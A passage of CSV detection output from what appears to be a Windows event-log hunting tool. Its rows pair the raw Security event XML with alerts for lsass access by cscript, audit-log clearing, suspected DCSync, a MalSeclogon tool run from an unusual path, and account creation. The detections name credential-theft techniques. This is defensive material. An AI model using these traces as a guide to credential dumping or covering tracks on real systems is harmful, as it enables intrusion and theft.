<Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
<Data Name=""SubjectUserName"">IEUser</Data>
<Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
<Data Name=""SubjectLogonId"">0x33392</Data>
<Data Name=""ObjectServer"">Security</Data>
<Data Name=""ObjectType"">Process</Data>
<Data Name=""ObjectName"">\Device\HarddiskVolume1\Windows\System32\lsass.exe</Data>
<Data Name=""HandleId"">0x558</Data>
<Data Name=""AccessList"">%%4484
</Data>
<Data Name=""AccessMask"">0x10</Data>
<Data Name=""ProcessId"">0x1688</Data>
<Data Name=""ProcessName"">C:\Windows\System32\cscript.exe</Data>
<Data Name=""ResourceAttributes"">-</Data>
</EventData>
</Event>",MSEDGEWIN10,Security
non-system accounts getting a handle to and accessing lsass,1583705494.340584,2020-03-09T02:11:34.340584+04:00,,Audit,High,Non-system account ( IEUser ) with process ( C:\Windows\System32\cscript.exe ) got access to object ( \Device\HarddiskVolume1\Windows\System32\lsass.exe ) of type ( Process ),4656,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
</Provider>
<EventID>4656</EventID>
<Version>1</Version>
<Level>0</Level>
<Task>12802</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-08T22:11:34.340479Z"">
</TimeCreated>
<EventRecordID>314461</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""4"" ThreadID=""160"">
</Execution>
<Channel>Security</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security>
</Security>
</System>
<EventData>
<Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
<Data Name=""SubjectUserName"">IEUser</Data>
<Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
<Data Name=""SubjectLogonId"">0x33392</Data>
<Data Name=""ObjectServer"">Security</Data>
<Data Name=""ObjectType"">Process</Data>
<Data Name=""ObjectName"">\Device\HarddiskVolume1\Windows\System32\lsass.exe</Data>
<Data Name=""HandleId"">0x558</Data>
<Data Name=""TransactionId"">00000000-0000-0000-0000-000000000000</Data>
<Data Name=""AccessList"">%%1537
%%1538
%%1539
%%1540
%%1541
%%4480
%%4481
%%4482
%%4483
%%4484
%%4485
%%4486
%%4487
%%4488
%%4489
%%4490
%%4491
%%4492
%%4493
</Data>
<Data Name=""AccessReason"">-</Data>
<Data Name=""AccessMask"">0x1f3fff</Data>
<Data Name=""PrivilegeList"">-</Data>
<Data Name=""RestrictedSidCount"">0</Data>
<Data Name=""ProcessId"">0x1688</Data>
<Data Name=""ProcessName"">C:\Windows\System32\cscript.exe</Data>
<Data Name=""ResourceAttributes"">-</Data>
</EventData>
</Event>",MSEDGEWIN10,Security
Audit log cleared,1556393475.355063,2019-04-27T23:31:15.355063+04:00,,Audit,Critical,Audit log cleared by user ( IEUser ),1102,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Eventlog"" Guid=""{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}"">
</Provider>
<EventID>1102</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>104</Task>
<Opcode>0</Opcode>
<Keywords>0x4020000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-27T19:27:55.274060Z"">
</TimeCreated>
<EventRecordID>4987</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""824"" ThreadID=""6060"">
</Execution>
<Channel>Security</Channel>
<Computer>IEWIN7</Computer>
<Security>
</Security>
</System>
<UserData>
<LogFileCleared xmlns:auto-ns3=""http://schemas.microsoft.com/win/2004/08/events"" xmlns=""http://manifests.microsoft.com/win/2004/08/windows/eventlog"">
<SubjectUserSid>S-1-5-21-3583694148-1414552638-2922671848-1000</SubjectUserSid>
<SubjectUserName>IEUser</SubjectUserName>
<SubjectDomainName>IEWIN7</SubjectDomainName>
<SubjectLogonId>0xffa8</SubjectLogonId>
</LogFileCleared>
</UserData>
</Event>",IEWIN7,Security
Audit log cleared,1600198172.174941,2020-09-15T23:29:32.174941+04:00,,Audit,Critical,Audit log cleared by user ( a-jbrown ),1102,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Eventlog"" Guid=""{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}"">
</Provider>
<EventID>1102</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>104</Task>
<Opcode>0</Opcode>
<Keywords>0x4020000000000000</Keywords>
<TimeCreated SystemTime=""2020-09-15T19:28:17.594374Z"">
</TimeCreated>
<EventRecordID>768617</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""264"" ThreadID=""796"">
</Execution>
<Channel>Security</Channel>
<Computer>01566s-win16-ir.threebeesco.com</Computer>
<Security>
</Security>
</System>
<UserData>
<LogFileCleared xmlns=""http://manifests.microsoft.com/win/2004/08/windows/eventlog"">
<SubjectUserSid>S-1-5-21-308926384-506822093-3341789130-1106</SubjectUserSid>
<SubjectUserName>a-jbrown</SubjectUserName>
<SubjectDomainName>3B</SubjectDomainName>
<SubjectLogonId>0x4c331</SubjectLogonId>
</LogFileCleared>
</UserData>
</Event>",01566s-win16-ir.threebeesco.com,Security
Dcsync Attack detected,1557281451.611176,2019-05-08T06:10:51.611176+04:00,,Threat,High,User Name ( Administrator ) is suspected doing dcsync attack ,4662,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
</Provider>
<EventID>4662</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>14080</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-08T02:10:43.487217Z"">
</TimeCreated>
<EventRecordID>202793</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""444"" ThreadID=""4632"">
</Execution>
<Channel>Security</Channel>
<Computer>DC1.insecurebank.local</Computer>
<Security>
</Security>
</System>
<EventData>
<Data Name=""SubjectUserSid"">S-1-5-21-738609754-2819869699-4189121830-500</Data>
<Data Name=""SubjectUserName"">Administrator</Data>
<Data Name=""SubjectDomainName"">insecurebank</Data>
<Data Name=""SubjectLogonId"">0x40c6511</Data>
<Data Name=""ObjectServer"">DS</Data>
<Data Name=""ObjectType"">%{19195a5b-6da0-11d0-afd3-00c04fd930c9}</Data>
<Data Name=""ObjectName"">%{c6faf700-bfe4-452a-a766-424f84c29583}</Data>
<Data Name=""OperationType"">Object Access</Data>
<Data Name=""HandleId"">0x0</Data>
<Data Name=""AccessList"">%%7688
</Data>
<Data Name=""AccessMask"">0x100</Data>
<Data Name=""Properties"">%%7688
{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}
{19195a5b-6da0-11d0-afd3-00c04fd930c9}
</Data>
<Data Name=""AdditionalInfo"">-</Data>
<Data Name=""AdditionalInfo2""></Data>
</EventData>
</Event>",DC1.insecurebank.local,Security
Dcsync Attack detected,1557281451.580169,2019-05-08T06:10:51.580169+04:00,,Threat,High,User Name ( Administrator ) is suspected doing dcsync attack ,4662,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
</Provider>
<EventID>4662</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>14080</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-08T02:10:43.487217Z"">
</TimeCreated>
<EventRecordID>202792</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""444"" ThreadID=""4632"">
</Execution>
<Channel>Security</Channel>
<Computer>DC1.insecurebank.local</Computer>
<Security>
</Security>
</System>
<EventData>
<Data Name=""SubjectUserSid"">S-1-5-21-738609754-2819869699-4189121830-500</Data>
<Data Name=""SubjectUserName"">Administrator</Data>
<Data Name=""SubjectDomainName"">insecurebank</Data>
<Data Name=""SubjectLogonId"">0x40c6511</Data>
<Data Name=""ObjectServer"">DS</Data>
<Data Name=""ObjectType"">%{19195a5b-6da0-11d0-afd3-00c04fd930c9}</Data>
<Data Name=""ObjectName"">%{c6faf700-bfe4-452a-a766-424f84c29583}</Data>
<Data Name=""OperationType"">Object Access</Data>
<Data Name=""HandleId"">0x0</Data>
<Data Name=""AccessList"">%%7688
</Data>
<Data Name=""AccessMask"">0x100</Data>
<Data Name=""Properties"">%%7688
{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}
{19195a5b-6da0-11d0-afd3-00c04fd930c9}
</Data>
<Data Name=""AdditionalInfo"">-</Data>
<Data Name=""AdditionalInfo2""></Data>
</EventData>
</Event>",DC1.insecurebank.local,Security
Audit log cleared,1600340264.254575,2020-09-17T14:57:44.254575+04:00,,Audit,Critical,Audit log cleared by user ( a-jbrown ),1102,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Eventlog"" Guid=""{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}"">
</Provider>
<EventID>1102</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>104</Task>
<Opcode>0</Opcode>
<Keywords>0x4020000000000000</Keywords>
<TimeCreated SystemTime=""2020-09-17T10:57:37.013214Z"">
</TimeCreated>
<EventRecordID>769792</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""264"" ThreadID=""7672"">
</Execution>
<Channel>Security</Channel>
<Computer>01566s-win16-ir.threebeesco.com</Computer>
<Security>
</Security>
</System>
<UserData>
<LogFileCleared xmlns=""http://manifests.microsoft.com/win/2004/08/windows/eventlog"">
<SubjectUserSid>S-1-5-21-308926384-506822093-3341789130-1106</SubjectUserSid>
<SubjectUserName>a-jbrown</SubjectUserName>
<SubjectDomainName>3B</SubjectDomainName>
<SubjectLogonId>0x4c331</SubjectLogonId>
</LogFileCleared>
</UserData>
</Event>",01566s-win16-ir.threebeesco.com,Security
Dcsync Attack detected,1557281443.487217,2019-05-08T06:10:43.487217+04:00,,Threat,High,User Name ( Administrator ) is suspected doing dcsync attack ,4662,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
</Provider>
<EventID>4662</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>14080</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-08T02:10:43.487217Z"">
</TimeCreated>
<EventRecordID>202791</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""444"" ThreadID=""4632"">
</Execution>
<Channel>Security</Channel>
<Computer>DC1.insecurebank.local</Computer>
<Security>
</Security>
</System>
<EventData>
<Data Name=""SubjectUserSid"">S-1-5-21-738609754-2819869699-4189121830-500</Data>
<Data Name=""SubjectUserName"">Administrator</Data>
<Data Name=""SubjectDomainName"">insecurebank</Data>
<Data Name=""SubjectLogonId"">0x40c6511</Data>
<Data Name=""ObjectServer"">DS</Data>
<Data Name=""ObjectType"">%{19195a5b-6da0-11d0-afd3-00c04fd930c9}</Data>
<Data Name=""ObjectName"">%{c6faf700-bfe4-452a-a766-424f84c29583}</Data>
<Data Name=""OperationType"">Object Access</Data>
<Data Name=""HandleId"">0x0</Data>
<Data Name=""AccessList"">%%7688
</Data>
<Data Name=""AccessMask"">0x100</Data>
<Data Name=""Properties"">%%7688
{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}
{19195a5b-6da0-11d0-afd3-00c04fd930c9}
</Data>
<Data Name=""AdditionalInfo"">-</Data>
<Data Name=""AdditionalInfo2""></Data>
</EventData>
</Event>",DC1.insecurebank.local,Security
Audit log cleared,1595449776.414827,2020-07-23T00:29:36.414827+04:00,,Audit,Critical,Audit log cleared by user ( a-jbrown ),1102,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Eventlog"" Guid=""{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}"">
</Provider>
<EventID>1102</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>104</Task>
<Opcode>0</Opcode>
<Keywords>0x4020000000000000</Keywords>
<TimeCreated SystemTime=""2020-07-22T20:29:27.321769Z"">
</TimeCreated>
<EventRecordID>887106</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""8"" ThreadID=""6640"">
</Execution>
<Channel>Security</Channel>
<Computer>01566s-win16-ir.threebeesco.com</Computer>
<Security>
</Security>
</System>
<UserData>
<LogFileCleared xmlns=""http://manifests.microsoft.com/win/2004/08/windows/eventlog"">
<SubjectUserSid>S-1-5-21-308926384-506822093-3341789130-1106</SubjectUserSid>
<SubjectUserName>a-jbrown</SubjectUserName>
<SubjectDomainName>3B</SubjectDomainName>
<SubjectLogonId>0x3a17a</SubjectLogonId>
</LogFileCleared>
</UserData>
</Event>",01566s-win16-ir.threebeesco.com,Security
Process running in Unusual location,1638898381.636384,2021-12-07T21:33:01.636384+04:00,,Threat,High,"User Name : ( MSEDGEWIN10$ ) with process : ( \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe ) run from Unusual location , check the number and date of execution in process execution report",4688,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
</Provider>
<EventID>4688</EventID>
<Version>2</Version>
<Level>0</Level>
<Task>13312</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime=""2021-12-07T17:33:01.619364Z"">
</TimeCreated>
<EventRecordID>329919</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""4"" ThreadID=""7648"">
</Execution>
<Channel>Security</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security>
</Security>
</System>
<EventData>
<Data Name=""SubjectUserSid"">S-1-5-18</Data>
<Data Name=""SubjectUserName"">MSEDGEWIN10$</Data>
<Data Name=""SubjectDomainName"">WORKGROUP</Data>
<Data Name=""SubjectLogonId"">0x3e7</Data>
<Data Name=""NewProcessId"">0x17b8</Data>
<Data Name=""NewProcessName"">\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe</Data>
<Data Name=""TokenElevationType"">%%1936</Data>
<Data Name=""ProcessId"">0x27c</Data>
<Data Name=""CommandLine""></Data>
<Data Name=""TargetUserSid"">S-1-0-0</Data>
<Data Name=""TargetUserName"">IEUser</Data>
<Data Name=""TargetDomainName"">MSEDGEWIN10</Data>
<Data Name=""TargetLogonId"">0x16e3db3</Data>
<Data Name=""ParentProcessName"">C:\Windows\System32\lsass.exe</Data>
<Data Name=""MandatoryLabel"">S-1-16-12288</Data>
</EventData>
</Event>",MSEDGEWIN10,Security
schedule task updated,1553518420.276615,2019-03-25T16:53:40.276615+04:00,,Audit,Low,schedule task updated by user,4702,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
</Provider>
<EventID>4702</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>12804</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-25T12:52:45.500611Z"">
</TimeCreated>
<EventRecordID>198239223</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""444"" ThreadID=""3616"">
</Execution>
<Channel>Security</Channel>
<Computer>DC1.insecurebank.local</Computer>
<Security>
</Security>
</System>
<EventData>
<Data Name=""SubjectUserSid"">S-1-5-20</Data>
<Data Name=""SubjectUserName"">DC1$</Data>
<Data Name=""SubjectDomainName"">insecurebank</Data>
<Data Name=""SubjectLogonId"">0x3e4</Data>
<Data Name=""TaskName"">\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask</Data>
<Data Name=""TaskContentNew"">&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-16&quot;?&gt;
&lt;Task version=&quot;1.4&quot; xmlns=&quot;http://schemas.microsoft.com/windows/2004/02/mit/task&quot;&gt;
&lt;RegistrationInfo&gt;
&lt;Source&gt;$(@%systemroot%\system32\sppc.dll,-200)&lt;/Source&gt;
&lt;Author&gt;$(@%systemroot%\system32\sppc.dll,-200)&lt;/Author&gt;
&lt;Version&gt;1.0&lt;/Version&gt;
&lt;Description&gt;$(@%systemroot%\system32\sppc.dll,-201)&lt;/Description&gt;
&lt;URI&gt;\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask&lt;/URI&gt;
&lt;SecurityDescriptor&gt;D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-80-123231216-2592883651-3715271367-3753151631-4175906628)(A;;FR;;;S-1-5-87-2912274048-3994893941-1669128114-1310430903-1263774323)&lt;/SecurityDescriptor&gt;
&lt;/RegistrationInfo&gt;
&lt;Triggers&gt;
&lt;CalendarTrigger&gt;
&lt;StartBoundary&gt;2019-03-26T12:51:45Z&lt;/StartBoundary&gt;
&lt;Enabled&gt;true&lt;/Enabled&gt;
&lt;ScheduleByDay&gt;
&lt;DaysInterval&gt;1&lt;/DaysInterval&gt;
&lt;/ScheduleByDay&gt;
&lt;/CalendarTrigger&gt;
&lt;/Triggers&gt;
&lt;Principals&gt;
&lt;Principal id=&quot;NetworkService&quot;&gt;
&lt;UserId&gt;S-1-5-20&lt;/UserId&gt;
&lt;RunLevel&gt;LeastPrivilege&lt;/RunLevel&gt;
&lt;/Principal&gt;
&lt;/Principals&gt;
&lt;Settings&gt;
&lt;MultipleInstancesPolicy&gt;IgnoreNew&lt;/MultipleInstancesPolicy&gt;
&lt;DisallowStartIfOnBatteries&gt;false&lt;/DisallowStartIfOnBatteries&gt;
&lt;StopIfGoingOnBatteries&gt;false&lt;/StopIfGoingOnBatteries&gt;
&lt;AllowHardTerminate&gt;false&lt;/AllowHardTerminate&gt;
&lt;StartWhenAvailable&gt;true&lt;/StartWhenAvailable&gt;
&lt;RunOnlyIfNetworkAvailable&gt;false&lt;/RunOnlyIfNetworkAvailable&gt;
&lt;IdleSettings&gt;
&lt;StopOnIdleEnd&gt;true&lt;/StopOnIdleEnd&gt;
&lt;RestartOnIdle&gt;false&lt;/RestartOnIdle&gt;
&lt;/IdleSettings&gt;
&lt;AllowStartOnDemand&gt;true&lt;/AllowStartOnDemand&gt;
&lt;Enabled&gt;true&lt;/Enabled&gt;
&lt;Hidden&gt;true&lt;/Hidden&gt;
&lt;RunOnlyIfIdle&gt;false&lt;/RunOnlyIfIdle&gt;
&lt;DisallowStartOnRemoteAppSession&gt;false&lt;/DisallowStartOnRemoteAppSession&gt;
&lt;UseUnifiedSchedulingEngine&gt;true&lt;/UseUnifiedSchedulingEngine&gt;
&lt;WakeToRun&gt;false&lt;/WakeToRun&gt;
&lt;ExecutionTimeLimit&gt;PT0S&lt;/ExecutionTimeLimit&gt;
&lt;Priority&gt;7&lt;/Priority&gt;
&lt;RestartOnFailure&gt;
&lt;Interval&gt;PT1M&lt;/Interval&gt;
&lt;Count&gt;3&lt;/Count&gt;
&lt;/RestartOnFailure&gt;
&lt;/Settings&gt;
&lt;Actions Context=&quot;NetworkService&quot;&gt;
&lt;ComHandler&gt;
&lt;ClassId&gt;{B1AEBB5D-EAD9-4476-B375-9C3ED9F32AFC}&lt;/ClassId&gt;
&lt;Data&gt;&lt;![CDATA[timer]]&gt;&lt;/Data&gt;
&lt;/ComHandler&gt;
&lt;/Actions&gt;
&lt;/Task&gt;</Data>
</EventData>
</Event>",DC1.insecurebank.local,Security
Audit log cleared,1645007839.637236,2022-02-16T14:37:19.637236+04:00,,Audit,Critical,Audit log cleared by user ( jbrown ),1102,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Eventlog"" Guid=""{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}"">
</Provider>
<EventID>1102</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>104</Task>
<Opcode>0</Opcode>
<Keywords>0x4020000000000000</Keywords>
<TimeCreated SystemTime=""2022-02-16T10:37:07.251285Z"">
</TimeCreated>
<EventRecordID>2988521</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""604"" ThreadID=""3848"">
</Execution>
<Channel>Security</Channel>
<Computer>01566s-win16-ir.threebeesco.com</Computer>
<Security>
</Security>
</System>
<UserData>
<LogFileCleared xmlns=""http://manifests.microsoft.com/win/2004/08/windows/eventlog"">
<SubjectUserSid>S-1-5-21-308926384-506822093-3341789130-1105</SubjectUserSid>
<SubjectUserName>jbrown</SubjectUserName>
<SubjectDomainName>3B</SubjectDomainName>
<SubjectLogonId>0x1717b6</SubjectLogonId>
</LogFileCleared>
</UserData>
</Event>",01566s-win16-ir.threebeesco.com,Security
User Created through management interface,1600248733.647851,2020-09-16T13:32:13.647851+04:00,,Audit,Medium,User Name ( 01566S-WIN16-IR$ ) Created User Name ( $ ),4720,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
</Provider>
<EventID>4720</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>13824</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime=""2020-09-16T09:32:13.647155Z"">
</TimeCreated>
<EventRecordID>769634</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""584"" ThreadID=""640"">
</Execution>
<Channel>Security</Channel>
<Computer>01566s-win16-ir.threebeesco.com</Computer>
<Security>
</Security>
</System>
<EventData>
<Data Name=""TargetUserName"">$</Data>
<Data Name=""TargetDomainName"">3B</Data>
<Data Name=""TargetSid"">S-1-5-21-308926384-506822093-3341789130-107104</Data>
<Data Name=""SubjectUserSid"">S-1-5-18</Data>
<Data Name=""SubjectUserName"">01566S-WIN16-IR$</Data>
<Data Name=""SubjectDomainName"">3B</Data>
<Data Name=""SubjectLogonId"">0x3e7</Data>
<Data Name=""PrivilegeList"">-</Data>
<Data Name=""SamAccountName"">$</Data>
<Data Name=""DisplayName"">%%1793</Data>
<Data Name=""UserPrincipalName"">-</Data>
<Data Name=""HomeDirectory"">%%1793</Data>
<Data Name=""HomePath"">%%1793</Data>
<Data Name=""ScriptPath"">%%1793</Data>
<Data Name=""ProfilePath"">%%1793</Data>
<Data Name=""UserWorkstations"">%%1793</Data>
<Data Name=""PasswordLastSet"">%%1794</Data>
<Data Name=""AccountExpires"">%%1794</Data>
<Data Name=""PrimaryGroupId"">513</Data>
<Data Name=""AllowedToDelegateTo"">-</Data>
<Data Name=""OldUacValue"">0x0</Data>
<Data Name=""NewUacValue"">0x15</Data>
<Data Name=""UserAccountControl"">
%%2080
%%2082
%%2084</Data>
<Data Name=""UserParameters"">%%1792</Data>
<Data Name=""SidHistory"">-</Data>
<Data Name=""LogonHours"">%%1793</Data>
</EventData>
</Event>",01566s-win16-ir.threebeesco.com,Security
User Created through management interface,1600248679.134161,2020-09-16T13:31:19.134161+04:00,,Audit,Medium,User Name ( 01566S-WIN16-IR$ ) Created User Name ( $ ),4720,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
</Provider>
<EventID>4720</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>13824</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime=""2020-09-16T09:31:19.133272Z"">
</TimeCreated>
<EventRecordID>769629</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""584"" ThreadID=""752"">
</Execution>
<Channel>Security</Channel>
<Computer>01566s-win16-ir.threebeesco.com</Computer>
<Security>
</Security>
</System>
<EventData>
<Data Name=""TargetUserName"">$</Data>
<Data Name=""TargetDomainName"">3B</Data>
<Data Name=""TargetSid"">S-1-5-21-308926384-506822093-3341789130-107103</Data>
<Data Name=""SubjectUserSid"">S-1-5-18</Data>
<Data Name=""SubjectUserName"">01566S-WIN16-IR$</Data>
<Data Name=""SubjectDomainName"">3B</Data>
<Data Name=""SubjectLogonId"">0x3e7</Data>
<Data Name=""PrivilegeList"">-</Data>
<Data Name=""SamAccountName"">$</Data>
<Data Name=""DisplayName"">%%1793</Data>
<Data Name=""UserPrincipalName"">-</Data>
<Data Name=""HomeDirectory"">%%1793</Data>
<Data Name=""HomePath"">%%1793</Data>
<Data Name=""ScriptPath"">%%1793</Data>
<Data Name=""ProfilePath"">%%1793</Data>
<Data Name=""UserWorkstations"">%%1793</Data>
<Data Name=""PasswordLastSet"">%%1794</Data>
<Data Name=""AccountExpires"">%%1794</Data>
<Data Name=""PrimaryGroupId"">513</Data>
<Data Name=""AllowedToDelegateTo"">-</Data>
<Data Name=""OldUacValue"">0x0</Data>
<Data Name=""NewUacValue"">0x15</Data>
<Data Name=""UserAccountControl"">
%%2080
%%2082
%%2084</Data>
<Data Name=""UserParameters"">%%1792</Data>
<Data Name=""SidHistory"">-</Data>
<Data Name=""LogonHours"">%%1793</Data>
</EventData>
</Event>",01566s-win16-ir.threebeesco.com,Security
schedule task updated,1553516620.16764,2019-03-25T16:23:40.167640+04:00,,Audit,Low,schedule task updated by user,4702,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
</Provider>
<EventID>4702</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>12804</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-25T12:22:45.317605Z"">
</TimeCreated>
<EventRecordID>198238969</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""444"" ThreadID=""3616"">
</Execution>
<Channel>Security</Channel>
<Computer>DC1.insecurebank.local</Computer>
<Security>
</Security>
</System>
<EventData>
<Data Name=""SubjectUserSid"">S-1-5-20</Data>
<Data Name=""SubjectUserName"">DC1$</Data>
<Data Name=""SubjectDomainName"">insecurebank</Data>
<Data Name=""SubjectLogonId"">0x3e4</Data>
<Data Name=""TaskName"">\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask</Data>
<Data Name=""TaskContentNew"">&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-16&quot;?&gt;
&lt;Task version=&quot;1.4&quot; xmlns=&quot;http://schemas.microsoft.com/windows/2004/02/mit/task&quot;&gt;
&lt;RegistrationInfo&gt;
&lt;Source&gt;$(@%systemroot%\system32\sppc.dll,-200)&lt;/Source&gt;
&lt;Author&gt;$(@%systemroot%\system32\sppc.dll,-200)&lt;/Author&gt;
&lt;Version&gt;1.0&lt;/Version&gt;
&lt;Description&gt;$(@%systemroot%\system32\sppc.dll,-201)&lt;/Description&gt;
&lt;URI&gt;\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask&lt;/URI&gt;
&lt;SecurityDescriptor&gt;D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-80-123231216-2592883651-3715271367-3753151631-4175906628)(A;;FR;;;S-1-5-87-2912274048-3994893941-1669128114-1310430903-1263774323)&lt;/SecurityDescriptor&gt;
&lt;/RegistrationInfo&gt;
&lt;Triggers&gt;
&lt;CalendarTrigger&gt;
&lt;StartBoundary&gt;2019-03-26T12:21:45Z&lt;/StartBoundary&gt;
&lt;Enabled&gt;true&lt;/Enabled&gt;
&lt;ScheduleByDay&gt;
&lt;DaysInterval&gt;1&lt;/DaysInterval&gt;
&lt;/ScheduleByDay&gt;
&lt;/CalendarTrigger&gt;
&lt;/Triggers&gt;
&lt;Principals&gt;
&lt;Principal id=&quot;NetworkService&quot;&gt;
&lt;UserId&gt;S-1-5-20&lt;/UserId&gt;
&lt;RunLevel&gt;LeastPrivilege&lt;/RunLevel&gt;
&lt;/Principal&gt;
&lt;/Principals&gt;
&lt;Settings&gt;
&lt;MultipleInstancesPolicy&gt;IgnoreNew&lt;/MultipleInstancesPolicy&gt;
&lt;DisallowStartIfOnBatteries&gt;false&lt;/DisallowStartIfOnBatteries&gt;
&lt;StopIfGoingOnBatteries&gt;false&lt;/StopIfGoingOnBatteries&gt;
&lt;AllowHardTerminate&gt;false&lt;/AllowHardTerminate&gt;
&lt;StartWhenAvailable&gt;true&lt;/StartWhenAvailable&gt;
